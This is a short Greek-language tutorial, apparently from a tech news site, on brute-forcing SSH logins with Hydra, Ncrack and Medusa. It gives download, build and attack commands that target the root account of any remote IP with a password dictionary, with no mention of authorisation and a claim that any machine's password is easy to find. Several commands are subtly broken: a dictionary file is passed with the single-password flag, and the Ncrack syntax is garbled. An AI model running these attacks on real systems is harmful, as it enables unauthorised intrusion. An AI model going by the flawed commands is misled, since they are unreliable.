Bruteforce SSH με Hydra, Ncrack και Medusa


Οι Bruteforce επιθέσεις λειτουργούν δοκιμάζοντας κάθε πιθανό συνδυασμό που θα μπορούσε να χρησιμοποιηθεί ως κωδικός πρόσβασης από τον χρήστη. Για να δείτε εάν ο κωδικός πρόσβασης είναι σωστός ή όχι, ελέγξτε για τυχόν σφάλματα στην απάντηση από τον διακομιστή.

Τα εργαλεία που θα χρησιμοποιήσουμε για το bruteforce του SSH είναι:

  1. HYDRA
  2. NCRACK
  3. MEDUSA

Τώρα για να κάνετε bruteforce οπουδήποτε, χρειάζεστε μια καλή λίστα λεξικών που μπορείτε εύκολα να τη βρείτε μέσω της βάσης δεδομένων ασφαλείας Packet storm .

1) Bruteforce χρησιμοποιώντας το Hydra

Για να εγκαταστήσετε το Hydra σε ένα υπολογιστή με Kali Linux, πληκτρολογήστε την παρακάτω εντολή:

Εντολή: apt-get install hydra hydra-gtk

Για να τρέξει πληκτρολογήστε

Εντολή: hydra -l root -p ‘<File Dictionary>’ <Remote IP> SSH

2) Bruteforce χρησιμοποιώντας το Ncrack

Το Ncrack είναι λίγο πιο δύσκολο από το Hydra στη χρήση του, αλλά είναι πιο ισχυρό μεταξύ όλων των άλλων εργαλείων. Για να κατεβάσετε το Ncrack, δώστε την εντολή:

Εντολή: wget https://nmap.org/ncrack/dist/ncrack-0.5.tar.gz

Τώρα εξαγάγετε το πακέτο Ncrack με τη βοήθεια της εντολής Tar:

Εντολή: tar -xvzf ncrack-0.5.tar.gz

Τώρα πρέπει να διαμορφώσουμε και να συντάξουμε αυτό το ncrack πληκτρολογώντας τις εντολές ” ./configure “, ” make ” και ” make install “.

Για να χρησιμοποιήσετε το Ncrack, πληκτρολογήστε την παρακάτω εντολή στο τερματικό σας:

Εντολή: ncrack -p 22 –root root -p ‘<File Dictionary>’ <Remote IP>

3) Bruteforce χρησιμοποιώντας το Medusa

Το Medusa είναι ένα άλλο δημοφιλές εργαλείο bruteforcing μέσω του οποίου μπορείτε εύκολα να βρείτε τον κωδικό πρόσβασης SSH οποιουδήποτε απομακρυσμένου μηχανήματος.

Για να κατεβάσετε το Medusa στα Kali Linux, πληκτρολογήστε την παρακάτω εντολή:

Εντολή: wget http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz

Τώρα για να εξαγάγετε το πακέτο λήψης medusa, πληκτρολογήστε:

Εντολή: tar -xvzf medusa-2.0.tar.gz

Τώρα μετά την εξαγωγή των αρχείων, το επόμενο βήμα που θα κάνουμε, είναι να διαμορφώσουμε το εργαλείο πληκτρολογώντας τις εντολές: “./configure”, “make” και “make install”.

Για να εκτελέσετε το Medusa, πληκτρολογήστε την ακόλουθη εντολή στο τερματικό σας:

Εντολή: medusa -u root -p ‘<File Dictionary>’ -h <Remote IP> -m ssh


Διαβάστε τις Τεχνολογικές Ειδήσεις από όλο τον κόσμο, με την εγκυρότητα του iGuRu.gr

Ακολουθήσετε μας στο Google News iGuRu.gr at Google news